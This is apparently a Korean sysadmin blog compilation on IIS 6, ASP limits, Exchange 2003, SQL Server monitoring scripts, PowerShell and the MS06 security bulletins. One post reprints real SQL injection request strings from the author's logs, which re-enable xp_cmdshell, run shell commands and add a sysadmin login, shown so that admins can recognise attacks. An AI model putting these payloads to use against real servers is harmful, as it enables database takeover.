 |
 |
Windows Server 2003 Service Pack 1 에서 부터는, 64-bit IIS 에서는 32-bit 응용프로그램을 운영할 수가 있습니다. Windows-32-on-Windows-64 (WOW64) 기술을 통해서 말이죠.^^
그런데, 64비트 에서 32비트 프로세스는 64비트 DLL을 로드할수 없으며 그 반대로도 할수 없습니다. 만일 64비트 IIS 에서 32비트 DLL을 호출할려면, 응용프로그램 풀을 분리해야 합니다.
말하자면, 별도의 Worker Process 를 통해서 응용프로그램을 호스팅해야 한다는 얘기인데요. 응용프로로그램에는 다음과 같은 것이 해당됩니다.
ISAPI 확장 모듈
ISAPI 필터
COM 을 이용하는 ASP 스크립트
ASP.NET
메타베이스 값을 수정하는 것인데요. 기본값은 오직 64비트만 가능하게 되어 있습니다. 당연히 성능상 64비트로만 구성된 웹사이트를 운영하는 것이 좋겠습니다.
다음 문서는 IIS 6 에 해당되는 내용으로, CGI/ISAPI 실행시 나타날 수 있는 사항입니다.
현상
IIS에서 CGI 응용 프로그램을 실행하려고 하면 다음과 같은 메시지가 나타납니다.
액세스가 거부되었습니다.
원인
이 문제는 익명 계정에 CGI에 대한 권한이 없는 경우 발생합니다. CGI 응용 프로그램을 시작하려고 하면 IIS에서는 익명 사용자를 사용합니다. 익명 계정에 해당 파일에 대한 권한이 없기 때문에 프로세스 실행이 실패하고 STDOUT을 통해 오류 메시지가 반환됩니다.
그러나 IIS에서는 프로세스가 정상적으로 실행되고 종료된 것으로 인식합니다. 액세스 거부 오류 메시지가 STDOUT에 있기 때문에 IIS에서는 프로세스 실패를 인식할 방법이 없습니다.
익명 계정이 프로세스를 시작할 수 있었기 때문에 다른 인증 방법을 시도하지 않습니다. IIS에서는 CreateProcessAsUser API 호출을 사용하여 CGI 응용 프로그램을 시작합니다. 사용자에게 CGI/ISAPI 응용 프로그램에 대한 NTFS 권한이 없는 경우 CreateProcessAsUser는 정상적으로 종료됩니다.
현상
SGC(Server Gated Cryptography) 인증서를 사용하면 HTTPS 프로토콜을 사용하여 사이트에 액세스하려는 클라이언트에 다음과 같은 오류 메시지가 나타날 수 있습니다.
IIS 4.0:
https://<sitename> 사이트를 열 수 없습니다.
제공된 인증서가 잘못되었습니다.
IIS 5.0:
페이지를 표시할 수 없습니다.
서버를 찾을 수 없거나 DNS 오류입니다.
ASP(Active Server Pages) 요청을 사용하여 Microsoft 인터넷 정보 서비스(IIS) 5.0, Microsoft 인터넷 정보 서비스(IIS) 5.1 또는 Microsoft 인터넷 정보 서비스(IIS) 6.0이 설치된 컴퓨터에 큰 파일을 업로드하면 업로드가 실패할 수 있습니다. 또한 403 오류 응답이나 다음 중 하나와 유사한 오류 메시지가 나타날 수 있습니다.
오류 메시지 1
Request object error 'ASP 0104 : 80004005' 허용되지 않는 작업 :
오류 메시지 2
007~ASP 0104~허용되지 않는 작업
많은 폼 데이터를 ASP 페이지에 게시할 때 다음과 유사한 오류 메시지가 나타날 수 있습니다.
오류 '80020009' 예외가 발생했습니다.
또한 Response.binaryWrite 메서드를 사용할 때 파일 업로드가 실패할 수 있습니다.
이 문제는 Content-Length 헤더가 있고 Content-Length 헤더에서 IIS 메타베이스의 AspMaxRequestEntityAllowed 속성 값보다 큰 데이터 양을 지정하는 경우 발생합니다. AspMaxRequestEntityAllowed 속성의 기본값은 204,800바이트입니다.
기본적으로 Exchange Server 2003 Standard Edition을 실행하는 서버에 있는 각 데이터베이스의 크기 제한은 16GB입니다. Exchange Server 2003 서비스 팩 2(SP2)를 설치한 경우 각 Exchange 데이터베이스의 기본 크기 제한은 18GB입니다.
Exchange Server 2003 SP2를 실행하는 서버에서는 데이터베이스 크기 제한을 데이터베이스당 최대 75GB까지 구성할 수 있습니다.
기본적으로 Exchange Server 2003 Enterprise Edition을 실행하는 서버에 있는 각 데이터베이스의 크기 제한은 8,000GB입니다. 일반적으로 이 크기는 이론상의 한도입니다. Exchange 데이터베이스의 실제 한도는 서버 하드웨어와 저장소 하위 시스템의 하드웨어에 따라 달라집니다.
Exchange Server 2003 SP2를 설치하면 데이터베이스 크기 제한을 최대 8,000GB까지 구성할 수 있습니다.
1. 레지스트리 경로
서버관리자나, DBA는 주기적인 서버 모니터링을 통해서 서버가 항상 청청한 상태로 운영되도록 하기 위한 모니터링이 필요하다.
xp_fixeddrives 는 DBA를 위한 프로시져로 비공식 프로시져 이다. xp_fixeddrives 이미 여러 전문가들에 의해서 소개된바 있다.
SQL Server 에는 다음과 같은 비공식 프로시져들이 존재한다. (*여기서 비공식이란 온라인도움말 문서화에 포함되지 않는 프로시져를 말한다)
create table #FreeSpace(
Drive char(1),
MB_Free int)
insert into #FreeSpace exec xp_fixeddrives
select @MB_Free = MB_Free from #FreeSpace where Drive = 'C'
-- Free Space on C drive Less than Threshold
if @MB_Free < 1024
exec master.dbo.xp_sendmail
@recipients ='webmaster@serverinfo.pe.kr',
@subject ='C Drive 여유공간 임계치 이하',
@message = 'Free space on C Drive
has dropped below 1 gig'
select @MB_Free = MB_Free from #FreeSpace where Drive = 'F'
-- Free Space on F drive Less than Threshold
if @MB_Free < 2048
exec master.dbo.xp_sendmail
@recipients ='webmaster@serverinfo.pe.kr',
@subject ='F 드라이브 여유공간 임계치 이하',
@message = 'Free space on F Drive
has dropped below 2 gig'
Log Parser 는 여러가지 로그 및 데이터를 파싱해서 특정 포맷으로 빠르게 변환해 주는 유틸로 잘 알려져 있다.
다운로드 : http://www.microsoft.com/downloads/details.aspx?FamilyID=890cd06b
-abf8-4c25-91b2-f8d975cf8c07&displaylang=en
Vbscript 나 Jscript 에서 COM 오브젝트를 호출하여 이용할수 있으며, 닷넷에서도 호출을 제공한다. 물론 RCW 로 래핑을 해줘야 하는데 이부분은 Visual Stuido 에서 참조추가를 하면 자동으로 처리를 해주므로 크게 신경쓰지 않아도 된다.
참조된 클래스를 보면, 소스포맷 및 출력포맷에 따른 각각의 클래스를 제공한다. 이유는 물론 데이터 포맷이 각각 다르므로 하나의 클래스에서 다 처리해준다는 것은 경우의 수가 많아서 일지도 모르겠다.
다음 예제는, Log Parser 에서 기본으로 제공하는 샘플코드 이다. 이러한 샘플코드를 소개하는 이유는 Log Parser 명령줄 유틸리티로는 서버관리자가 원하는 다양한 방식의 운영이 조금 불편한 점도 없지 않다.
이를 테면, 매일 웹사이트 로그중 웹오류인 500 에 대해서 파싱된 데이터를 특정 메일주소로 발송을 해준다던가 특정 디렉토리에 넣어주는 방법도 있을 것이다.
위 예제는 이벤트로그를 소스 데이터로 이용하는 경우인데., 맨위 클래스 목록에 있는 모든것이 이용이 가능하다.
IIS로그라면,
dim AppsInPool, objAppPool, index, IISObj, IISPath, Version, pos
Dim Versions(), objAppPools
function FindASPXScriptMapVersion(ScriptMaps)
Dim pos, ScriptMap
for pos = lbound(ScriptMaps) to UBOund(ScriptMaps)
ScriptMap = lcase(ScriptMaps(POS))
if (left(ScriptMap, 5) = ".aspx") then
FindASPXScriptMapVersion = mid(ScriptMap, 42)
FindASPXScriptMapVersion = left(FindASPXScriptMapVersion, _
instr(FindASPXScriptMapVersion, "\")-1)
exit function
end if
next
FindASPXScriptMapVersion = ""
end function
function AddVersion(Version, Path)
dim Found, pos
Found = false
for pos = lbound(Versions) to UBound(Versions)-1
if (Versions(pos) = Version) then
Found = true
end if
next
if (Found = false) then
redim preserve Versions(ubound(Versions)+1)
Versions(ubound(Versions)-1)= Version
end if
end function
Set objAppPools = GetObject("IIS://localhost/W3SVC/AppPools")
for each objAppPool in objAppPools
Redim Versions(0)
Set objAppPool = GetObject("IIS://localhost/W3SVC/AppPools/" & objAppPool.Name )
WScript.echo objAppPool.Name
AppsInPool= objAppPool.EnumAppsInPool()
if (ubound(AppsInPool) = -1) then
WScript.echo vbtab & "No applications using this pool!"
else
for index = lbound(AppsInPool) to UBound(AppsInPool)
IISPath = AppsInPool(index)
IISPath = "IIS://localhost/" & mid(IISPath,5, len(IISPath)-5)
set IISObj = GetObject(IISPath)
Version = FindASPXScriptMapVersion(IISObj.ScriptMaps)
call AddVersion(Version, mid(IISPath,5, len(IISPath)-5))
next
if (ubound(Versions)> 1) then
WScript.Echo vbcrlf & vbtab & _
"Warning multiple version of the .NET framework detected!" & vbcrlf
for pos = lbound(Versions) to ubound(Versions)-1
WScript.echo vbtab & "Found references to " & Versions(pos)
next
WScript.echo ""
for index = lbound(AppsInPool) to UBound(AppsInPool)
IISPath = AppsInPool(index)
IISPath = "IIS://localhost/" & mid(IISPath,5, len(IISPath)-5)
set IISObj = GetObject(IISPath)
Version = FindASPXScriptMapVersion(IISObj.ScriptMaps)
WScript.echo vbtab & mid(IISPath,5, len(IISPath)-5) & _
space(70 - len(IISpath)) & " - " & Version
next
else
for pos = lbound(Versions) to ubound(Versions)-1
WScript.echo vbtab & "Found references to " & Versions(pos)
next
end if
end if
WScript.echo ""
next
ASP.NET V2.0
Found references to v2.0.50727
DefaultAppPool
Found references to v1.1.4322
MSSharePointAppPool
Found references to v1.1.4322
ReportServer
Warning multiple version of the .NET framework detected!
Found references to v2.0.50727
Found references to
//localhost/W3SVC/1/ROOT/Report - v2.0.50727
//localhost/W3SVC/1/ROOT/ReportServe -
ASP.NET V1.1
No applications using this pool!
여러 보안 기관 및 언론등에서 자주 오르내리는 해킹사건의 상당 부분이 웹사이트를 통해서 이루어지고 있다.
왜냐면, 요즘에는 거의 대부분 방화벽등의 장비등을 통해서 막아 놓기 때문에 역시 공개되어 있는 루트를 이용해야 하는데 그것이 바로 웹사이트 이기 때문이다.
예전에는 주로 서버자체 OS나 응용프로그램의 취약점을 노리고 있으나, 최근에는 웹사이트 프로그램 코드의 취약점을 이용하고 있으며, 국내 웹사이트의 상당수가 (일부 포털의 CP 사이트 포함) 노출되어 있는 형국이고,. 데이터가 탈취 당했음에도 여전히 모르고 있는체 웹사이트가 운영되고 있다.
웹사이트 해킹은, 해당 웹사이트 파괴나 데이터 위변조에서 멈추는게 아니라 곧바로 시스템까지 해킹할수 있게 된다.
요즘에 극성을 부리는 중국(일명 짱께) 에서 하루가 멀다하고 해킹시도가 이루어 지고 있고 그 대부분이 Sql Injection, FTP 스캔, RPC, SMB 등이다.
위 통계는, http://www.krcert.or.kr/index.jsp 에서 해킹 트랜드를 확인할수가 있다.
자, 그럼 그중에 가장 위험한 DB 연동 웹사이트에 의한 데이터 위변조 및 시스템해킹 인데 그들이 어떤 흔적을 남기는지 결과를 통해서 현재 운영하는 본인의 시스템을 점검해 보는것이 좋다.
(* 샘플 일부의 내용중 서버명의 경우 SERVERINFO,serverinfo.pe.kr 로 변경함)
1. 웹사이트 연동 데이터베이스 DB 의 테이블 목록 확인.
Sql Injection 을 통해서 해킹이 된 경우, 데이터 유출을 하는 경우도 일부 있으나 대부분 시스템을 조회한 테이블을 남긴다. 일부 해커의 경우는 조회후 테이블을 삭제하기도 한다.
DB의 테이블 목록을 정기적으로 점검을 해보는 것이 좋은데, 해킹된 DB의 경우 주로 다음과 같은 이름의 테이블이 생성되어 있다.
테이블 스키마나, 레코드를 보면 테이블 이름과 비슷한 내용이 들어 있는데 주로 시스템디렉토리 목록이나 웹사이트 디렉토리 목록, 레지스트리 값 조회가 대부분 이다.
위를 시도한 다음에,, 가능하다고 판단을 했던것 일까?.. 보다 적극적인 공격을 시도한다.
다음 레퍼러주소에 따라오는 쿼리문은 공격의 일부 샘플이다. 어떤가?.. 상상을 초월하지 않는가?.
http://www.serverinfo.pe.kr/TipnTech.aspx?Content=Net&Search=&vMode=View&page=&
Seq=105;DROP TABLE [X_5450];use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')--
예외,. 오류: 'guest' 사용자에게는 DBCC 'addextendedproc'을(를) 실행할 권한이 없습니다.
데이터베이스 컨텍스트가 'master'(으)로 변경되었습니다.
http://www.serverinfo.pe.kr/TipnTech.aspx?Content=Net&Search=&vMode=View&page=&
Seq=105 And (Select Top 1 CASE WHEN ResultTxt is Null then char(124) else ResultTxt+char(124) End from (Select Top 1 id,ResultTxt from [X_5450] order by [id]) T order by [id] desc)>0
http://www.serverinfo.pe.kr/TipnTech.aspx?Content=Net&Search=&vMode=View&page=&
Seq=105;use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')--
http://www.serverinfo.pe.kr/TipnTech.aspx?Content=Net&Search=&vMode=View&page=&
Seq=105;CREATE TABLE [X_5450]([id] int NOT NULL IDENTITY (1,1), [ResultTxt] nvarchar(4000) NULL);insert into [X_5450](ResultTxt) exec master.dbo.xp_cmdshell 'dir c:';insert into [X_5450] values ('g_over');exec master.dbo.sp_dropextendedproc 'xp_cmdshell'--
http://www.serverinfo.pe.kr/TipnTech.aspx?Content=Net&Search=&vMode=View&page=&
Seq=105;use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'OSQL -E -S localhost -d master -Q "exec sp_addsrvrolemember dir c:,sysadmin"'--
http://www.serverinfo.pe.kr/TipnTech.aspx?Content=Net&Search=&vMode=View&page=&
Seq=105;use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'OSQL -E -S localhost -d master -Q "exec sp_addlogin dir c:,xiaoxue"'--
http://www.serverinfo.pe.kr/TipnTech.aspx?Content=Net&Search=&vMode=View&page=&
Seq=105;DROP TABLE [X_5450];use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')--
정통부가 무슨생각으로 "보안서버" (*정확한 명칭은 웹서버 SSL 인증서) 를 의무화 한다는 것인지 의아합니다.
무료로 보안서버 구축이 가능하다면 의무화를 해도 좋지만, 매년 10~40 만원을, 그것도 도메인당 지출을 사업자에게 강요한다는 것이 말이죠..
웹서버 SSL은, 웹서버와 클라이언트 브라우져간 데이터가 평문 형태로 전송되기 때문에 중간에 해커가 패킷을 가로채서 정보를 취득할 수 위험을 낮추기 위해서 암호화를 하는 것인데,
실제 요즘의 해킹 트랜드는, 위 방법의 중간 패킷을 가로채서 발생하는 침해사고는 아주 미약하고 대부분이 웹사이트 자체를 해킹해서 웹서버 및 DB서버에서 데이터를 빼내오는 방법입니다.
요즘 많이들 나온는, Sql Injection 같은 방법인데요. 웹서버 SSL 은 이에 대한 대안은 아닙니다. 최근에 뉴스에 종종 나오는 해킹사고 거의 대부분이 Sql Injection 같은 웹서버의 직접적인 해킹입니다.
그런데, 정통부는 그런 웹서버에 SSL 적용을 의무화를 강제화 할려는 것이죠..
"보안서버는 인터넷에서 개인정보를 암호화해 전송하는 서버로 개인정보 보호에 필수적인 장치다. 일반 PC에는 암호 기능이 내장돼 있으나 웹사이트의 서버에는 보안 기능을 설치해야만 암호 통신이 가능하다. 이에 따라 기업들은 서버에 보안 인증서를 발급받아 설치해야 보안 서버를 만들 수 있다."
기사원문 : http://www.etnews.co.kr/news/detail.html?id=200611100110
기존의 Monad 즉, Microsoft Command Shell , MSH 로 코드네임 이었던 것이 정식명칭 Windows PowerShell 로 변경이 되었습니다.
Windows 기반을 Shell 에서 보다 강력하게 관리할수 있을것을 예상되지만,. 역시 명령어나 사용법도 새로 배워야 겠죠?...
기존 vbscript 에서 WMI 에 엑세스하는 경우에는,
strComputer = "."
Set objWMIService = GetObject("winmgmts:\\" & strComputer &"\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * From Win32_Process")
For Each objItem in colItems
Wscript.Echo objItem.Name, objItem.WorkingSetSize
Next
Windows PowerShell 에서는, 다음과 같이 get 명령어와 파라미터를 통해서 호출이 가능해 집니다.
$strComputer = "."
$colItems = get-wmiobject -class "Win32_Process" -namespace "root\cimv2" -computername $strComputer
foreach ($objItem in $colItems) {
write-host $objItem.Name, $objItem.WorkingSetSize
}
현재 다음 웹사이트에서 정식버젼을 다운로드 받아 설치가 가능한 상태입니다.
http://www.microsoft.com/windowsserver2003/technologies/
management/powershell/default.mspx
-----------------------------------------
"발표의 중심이 된 것은 MS의 새로운 커맨드 라인 쉘 및 스크립팅 툴로 IT관리자가 자사의 윈도우 시스템을 운용하기 위해 이용하는「윈도우 파워쉘 1.0」이다. MS에 의하면 IT전문가는 파워쉘을 이용해 생산성을 큰폭으로 향상시키는 것으로 시스템의 관리성을 높이고 자동화를 촉진할 수 있다고 했다. "
기사원문 : http://www.zdnet.co.kr/news/enterprise/dev/0,39031103,39153001,00.htm
공지 번호: Microsoft 보안 공지 MS06-067
공지 제목: Internet Explorer 누적 보안 업데이트(922760)
요약: 이 업데이트는 원격 코드 실행을 허용할 수 있는 Internet Explorer 취약점을 해결합니다.
최대 심각도: 긴급
취약점으로 인한 영향: 원격 코드 실행
공지 번호: Microsoft 보안 공지 MS06-068
공지 제목: Microsoft Agent의 취약점으로 인한 원격 코드 실행 문제점(920213)
요약: 이 업데이트는 원격 코드 실행을 허용할 수 있는 Microsoft Agent의 취약점을 해결합니다.
최대 심각도: 긴급
취약점으로 인한 영향: 원격 코드 실행
공지 번호: Microsoft 보안 공지 MS06-069
공지 제목: Macromedia Flash Player의 취약점으로 인한 원격 코드 실행 문제점(923789)
요약: 이 업데이트는 원격 코드 실행을 허용할 수 있는 Adobe의 Macromedia Flash Player 취약점을 해결합니다.
최대 심각도: 긴급
취약점으로 인한 영향: 원격 코드 실행
공지 번호: Microsoft 보안 공지 MS06-070
공지 제목: 워크스테이션 서비스의 취약점으로 인한 원격 코드 실행 문제점(924270)
요약: 이 업데이트는 원격 코드 실행을 허용할 수 있는 워크스테이션 서비스의 취약점을 해결합니다.
최대 심각도: 긴급
취약점으로 인한 영향: 원격 코드 실행
공지 번호: Microsoft 보안 공지 MS06-071
공지 제목: Microsoft XML Core Services의 취약점으로 인한 원격 코드 실행 문제점(928088)
요약: 이 업데이트는 원격 코드 실행을 허용할 수 있는 XML?Core Services의 취약점을 해결합니다.
최대 심각도: 긴급
취약점으로 인한 영향: 원격 코드 실행
공지 번호: Microsoft 보안 공지 MS06-066
공지 제목: Client Service for NetWare의 취약점으로 인한 원격 코드 실행 문제점(923980)
요약: 이 업데이트는 원격 코드 실행을 허용할 수 있는 Client Service for NetWare 취약점을 해결합니다. 기본적으로 Client Service for NetWare는 영향을 받는 운영 체제 버전에 설치되어 있지 않습니다.
최대 심각도: 중요
취약점으로 인한 영향: 원격 코드 실행
부인:
Microsoft 기술 자료에서 제공되는 정보는 어떠한 보증도 없이 "있는 그대로" 제공됩니다. Microsoft는 상품성 및 특정 목적에의 적합성에 대한 보증을 포함하여 명시적이거나 묵시적인 어떤 보증도 하지 않습니다. Microsoft Corporation 또는 그 공급자는 모든 직접적, 간접적, 부수적, 파생적 손해 또는 영업 이익 손실 또는 특수한 손실에 대하여 어떠한 경우에도 책임을 지지 않으며, 이는 Microsoft Corporation과 그 공급자가 그와 같은 손해의 가능성을 사전에 알고 있던 경우에도 마찬가지입니다. 일부 지역에서는 파생적 또는 부수적 손해에 대한 책임의 배제 또는 제한을 허용하지 않으므로 위 제한은 귀하에게 적용되지 않을 수도 있습니다.
